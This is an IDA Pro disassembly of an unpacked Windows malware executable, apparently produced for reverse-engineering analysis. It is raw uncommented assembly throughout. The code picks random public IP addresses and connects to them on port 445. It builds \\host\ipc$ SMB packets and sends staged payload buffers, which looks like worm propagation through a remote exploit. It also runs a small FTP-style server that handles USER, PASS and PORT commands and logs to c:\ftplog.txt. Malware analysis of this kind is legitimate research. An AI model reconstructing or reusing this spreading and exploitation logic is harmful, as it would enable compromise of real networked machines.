;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : A81B968AC4175E4ABE1AFDA825A23DAD
; File Name : u:\work\a81b968ac4175e4abe1afda825a23dad_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40126C+7C�p
; sub_401F4B:loc_401FC9�p ...
mov eax, dword_4070C0
imul eax, 343FDh
add eax, 279EC3h
mov dword_4070C0, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_4020D9+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4070C0, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_4020D9+11�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_405104
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405134
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
loc_40106D: ; DATA XREF: .rsrc:loc_4237A9�w
; sub_423AD5+14�r ...
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40126C+9C�p
; sub_401F4B+3E�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_40512C
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405138
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_405130
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F4B+137�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4022A0
add esp, 10h
push 6
push 1
pop ebx
push ebx
loc_4011A1: ; DATA XREF: sub_421E0A+7�r
push 2
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_405124
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405128
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
loc_4011D2: ; DATA XREF: sub_421D8C+1D�r
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40126C+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405134
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405138
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401B59+2B5�p
arg_0 = dword ptr 4
inc dword_4070C4
push esi
push 0
push offset aCFtplog_txt ; "c:\\ftplog.txt"
call dword_405028 ; _lcreat
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40126A
push ebx
push edi
push 2
push 0
push esi
call dword_405024 ; _llseek
push [esp+0Ch+arg_0]
call sub_402300
mov edi, dword_405020
pop ecx
push eax
push [esp+10h+arg_0]
push esi
call edi ; dword_405020
mov ebx, offset asc_406A0C ; "\r\n"
push ebx
call sub_402300
pop ecx
push eax
push ebx
push esi
call edi ; dword_405020
push esi
call dword_40501C ; _lclose
pop edi
pop ebx
loc_40126A: ; CODE XREF: sub_401210+19�j
pop esi
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126C proc near ; CODE XREF: sub_401A69+7B�p
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_10], 2
push 3FEh
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4022A0
add esp, 10h
push 6
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012D1
xor al, al
jmp loc_401379
; ---------------------------------------------------------------------------
loc_4012D1: ; CODE XREF: sub_40126C+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_405124
cmp eax, 0FFFFFFFFh
jz loc_401370
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_4070C8
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+var_33C]
push eax
call dword_4050F0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402300
add esp, 1Ch
test eax, eax
jbe short loc_401362
loc_40133E: ; CODE XREF: sub_40126C+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call dword_405118
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402300
cmp esi, eax
pop ecx
jb short loc_40133E
loc_401362: ; CODE XREF: sub_40126C+D0�j
push 3E8h
call dword_40502C ; Sleep
mov bl, 1
pop esi
loc_401370: ; CODE XREF: sub_40126C+75�j
push edi
call dword_405128
mov al, bl
loc_401379: ; CODE XREF: sub_40126C+60�j
pop edi
pop ebx
leave
retn
sub_40126C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40137D proc near ; CODE XREF: sub_401A69+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_4070C8
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050F0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013B6: ; CODE XREF: sub_40137D+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013B6
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402380
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402300
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402380
lea eax, [ebp+var_3C]
push eax
call sub_402300
shl al, 1
add al, 9
push 1
loc_40144C: ; DATA XREF: .rsrc:004220A7�r
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402380
add esp, 2Ch
push [ebp+arg_0]
call dword_405138
mov ebx, eax
cmp ebx, edi
jz loc_401539
push edi
push 1
push 2
call dword_405120
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401539
push 1BDh
loc_401493: ; DATA XREF: .text:off_4065D8�o
mov [ebp+var_14], 2
call dword_40511C
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4022A0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405124
cmp eax, 0FFFFFFFFh
jz short loc_401539
mov ebx, dword_405118
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401539
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405114
call esi ; dword_405114
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401539
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405114
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; dword_405118
cmp eax, 0FFFFFFFFh
jnz short loc_40153D
loc_401539: ; CODE XREF: sub_40137D+F2�j
; sub_40137D+10B�j ...
xor eax, eax
jmp short loc_40157E
; ---------------------------------------------------------------------------
loc_40153D: ; CODE XREF: sub_40137D+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; dword_405114
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401555: ; CODE XREF: sub_40137D+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050F0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401555
push [ebp+arg_0]
call dword_405128
push 1
pop eax
loc_40157E: ; CODE XREF: sub_40137D+1BE�j
pop edi
pop esi
loc_401580: ; DATA XREF: sub_421D8C:loc_421E35�w
pop ebx
leave
retn
sub_40137D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401583 proc near ; CODE XREF: sub_401A69+3B�p
; sub_401A69+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
loc_401584: ; DATA XREF: sub_421D8C+B0�w
mov ebp, esp
mov eax, 89C4h
call sub_4026C0
mov eax, dword_406A3C
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A40
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050F0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015BD: ; CODE XREF: sub_401583+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015BD
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402380
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402300
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402380
lea eax, [ebp+var_4C]
push eax
call sub_402300
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402380
add esp, 2Ch
push 3FEh
call dword_40511C
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402380
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_4016FF
cmp ebx, 2
jz short loc_4016FF
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4022A0
mov esi, offset loc_406034
push esi
call sub_402300
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402380
lea eax, [ebp+var_14]
push eax
call sub_402300
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402380
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017D3
; ---------------------------------------------------------------------------
loc_4016FF: ; CODE XREF: sub_401583+115�j
; sub_401583+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4022A0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402380
mov esi, offset loc_406034
push esi
call sub_402300
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402380
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A34
push eax
call sub_402380
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402380
add esp, 40h
push esi
call sub_402300
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402380
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_40178B: ; CODE XREF: sub_401583+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_40178B
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4022A0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4022A0
add esp, 18h
loc_4017D3: ; CODE XREF: sub_401583+177�j
push 0
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A62
push 1BDh
mov [ebp+var_24], 2
call dword_40511C
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4022A0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405124
cmp eax, 0FFFFFFFFh
jz loc_401A62
mov esi, dword_405118
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405114
call edi ; dword_405114
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
loc_4018DB: ; DATA XREF: .rsrc:004220B1�o
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
cmp [ebp+arg_4], 1
jz short loc_4019A0
cmp [ebp+arg_4], 2
jz short loc_4019A0
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402380
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402380
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402380
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A43
; ---------------------------------------------------------------------------
loc_4019A0: ; CODE XREF: sub_401583+3B8�j
; sub_401583+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402380
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402380
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402380
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402380
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402380
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; dword_405114
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A43: ; CODE XREF: sub_401583+418�j
push eax
push [ebp+var_4]
call esi ; dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401A62
push 3E8h
call dword_40502C ; Sleep
push [ebp+var_4]
call dword_405128
loc_401A62: ; CODE XREF: sub_401583+264�j
; sub_401583+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_401583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A69 proc near ; CODE XREF: sub_4020D9+27�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_40137D
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401AEA
lea eax, [ebp+var_84]
push offset dword_406A48
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401AAD
push 0
push esi
call sub_401583
push 0
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AAD: ; CODE XREF: sub_401A69+36�j
lea eax, [ebp+var_84]
push offset dword_406A44
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401AD0
push 1
push esi
call sub_401583
push 1
jmp short loc_401ADA
; ---------------------------------------------------------------------------
loc_401AD0: ; CODE XREF: sub_401A69+59�j
push 2
push esi
call sub_401583
push 2
loc_401ADA: ; CODE XREF: sub_401A69+42�j
; sub_401A69+65�j
push esi
call sub_401583
add esp, 10h
push esi
call sub_40126C
pop ecx
loc_401AEA: ; CODE XREF: sub_401A69+1F�j
pop esi
leave
retn
sub_401A69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AED proc near ; CODE XREF: sub_40219B+DA�p
; sub_40219B+E6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40500C
test eax, eax
jnz short loc_401B19
push [ebp+arg_8]
push [ebp+arg_4]
call dword_405010
push [ebp+arg_4]
call dword_405000
loc_401B19: ; CODE XREF: sub_401AED+15�j
pop ebp
retn
sub_401AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B1B proc near ; CODE XREF: sub_401F4B+126�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404DA2
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D9C
test eax, eax
jnz short loc_401B4D
or eax, 0FFFFFFFFh
jmp short loc_401B56
; ---------------------------------------------------------------------------
loc_401B4D: ; CODE XREF: sub_401B1B+2B�j
push esi
call sub_404D96
mov eax, [ebp+var_1C]
loc_401B56: ; CODE XREF: sub_401B1B+30�j
pop esi
leave
retn
sub_401B1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B59 proc near ; DATA XREF: sub_401EC0+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E84
push esi
push edi
push 0
push off_4068D0
call sub_402300
mov esi, dword_405118
pop ecx
push eax
push off_4068D0
push ebx
call esi ; dword_405118
mov edi, [ebp+arg_0]
jmp short loc_401B97
; ---------------------------------------------------------------------------
loc_401B94: ; CODE XREF: sub_401B59+31A�j
mov ebx, [ebp+arg_0]
loc_401B97: ; CODE XREF: sub_401B59+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call dword_405114
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401BE8
push 0
push off_4068D4
call sub_402300
pop ecx
push eax
push off_4068D4
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401BE8: ; CODE XREF: sub_401B59+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401C19
push 0
push off_4068D8
call sub_402300
pop ecx
push eax
push off_4068D8
jmp loc_401E6C
; ---------------------------------------------------------------------------
loc_401C19: ; CODE XREF: sub_401B59+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz loc_401CF5
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402810
mov ax, word_406A68
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402770
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C68: ; CODE XREF: sub_401B59+159�j
test ebx, ebx
jz short loc_401C9C
cmp edi, 4
jge short loc_401C7F
push ebx
call sub_401E8B
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C7F: ; CODE XREF: sub_401B59+116�j
jnz short loc_401C8B
push ebx
call sub_401E8B
pop ecx
mov [ebp+var_18], eax
loc_401C8B: ; CODE XREF: sub_401B59:loc_401C7F�j
cmp edi, 5
jnz short loc_401C9F
push ebx
call sub_401E8B
